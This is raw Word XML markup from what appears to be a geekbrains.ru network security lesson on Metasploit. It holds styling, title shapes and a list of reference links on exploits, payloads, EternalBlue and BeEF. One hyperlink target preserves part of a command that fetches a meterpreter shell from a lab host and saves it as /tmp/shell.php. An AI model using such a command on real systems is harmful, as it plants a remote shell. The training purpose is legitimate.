    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="b7b7b7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6">
    <w:pPr>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="abb1b9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="abb1b9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© geekbrains.ru</w:t>
      <w:tab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3">
    <w:pPr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-728979</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7581900" cy="2327222"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="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2327222"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6858000" cy="2097300"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:cNvPr id="2" name="Shape 2"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6858000" cy="1386300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E9EDF4"/>
                        </a:solidFill>
                        <a:ln cap="flat" cmpd="sng" w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EFEFE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72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  <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:cNvPr id="3" name="Shape 3"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="561975" y="1592400"/>
                          <a:ext cx="1209600" cy="5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4c5d6e"/>
                                <w:sz w:val="48"/>
                                <w:vertAlign w:val="baseline"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Урок 5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  <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr descr="Сетевая безопасность. Урок 1.Анализ сетевого трафика.png" id="4" name="Shape 4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b="30218" l="33572" r="34569" t="27928"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="4867275" y="689275"/>
                          <a:ext cx="1304924" cy="12858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SpPr txBox="1"/>
                      <wps:cNvPr id="5" name="Shape 5"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="561975" y="792300"/>
                          <a:ext cx="3486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72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4c5d6e"/>
                                <w:sz w:val="24"/>
                                <w:vertAlign w:val="baseline"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Сетевая безопасность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-728979</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7581900" cy="2327222"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR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81900" cy="232722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17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5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color w:val="2c2d30"/>
        <w:lang w:val="ru-RU"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="200" w:before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line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:color w:val="4d5d6d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</w:pPr>
    <w:rPr>
      <w:color w:val="4d5d6d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</w:pPr>
    <w:rPr>
      <w:i w:val="1"/>
      <w:color w:val="abb1b9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</w:pPr>
    <w:rPr>
      <w:color w:val="4d5d6d"/>
      <w:sz w:val="88"/>
      <w:szCs w:val="88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0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="abb1b9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pPr>
      <w:spacing w:after="0" w:before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5.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2017/04/24/windows-kernel-exploits/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-3-payloads-0157032/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/vulnerability-scanning-metasploit-part-2/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/ru-ru/help/4023262/how-to-verify-that-ms17-010-is-installed" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kali.tools/?p=1435" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cryptoworld.su/beef-framework/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cryptoworld.su/metasploit-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BA%D1%86%D0%B8%D1%8F-%D0%BF%D0%BE-%D0%BF%D1%80%D0%B8%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8E/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackware.ru/?p=2900" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.carnal0wnage.com/papers/msf_aux_modules.pd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7.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId4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38.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://metasploit.help.rapid7.com/docs/comparing-product-editions" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/vulnerability-scanning-metasploit-part-2/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/company/ruvds/blog/343612/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/wiki" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@svyatoslavlogyn/%D1%87%D1%82%D0%BE-%D1%82%D0%B0%D0%BA%D0%BE%D0%B5-metasploit-%D0%B8-%D1%87%D1%82%D0%BE-%D0%BD%D1%83%D0%B6%D0%BD%D0%BE-%D0%B7%D0%BD%D0%B0%D1%82%D1%8C-%D0%BE-%D0%BD%D0%B5%D0%BC-5a1923b36b88" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/metasploit/metasploit_basic_commands.htm" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://metasploit.help.rapid7.com/docs" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyber-defense.sans.org/resources/papers/gsec/introduction-metasploit-project-penetration-tester-107151" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyber-defense.sans.org/resources/papers/gsec/introduction-metasploit-project-penetration-tester-107151" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/company/ruvds/blog/343612/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/post/131112/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/msfencode/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.103/mtrprpt_shell.txt%20-O%20/tmp/shell.php" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbhackers.com/windows-eternalblue-doublepulsar/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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8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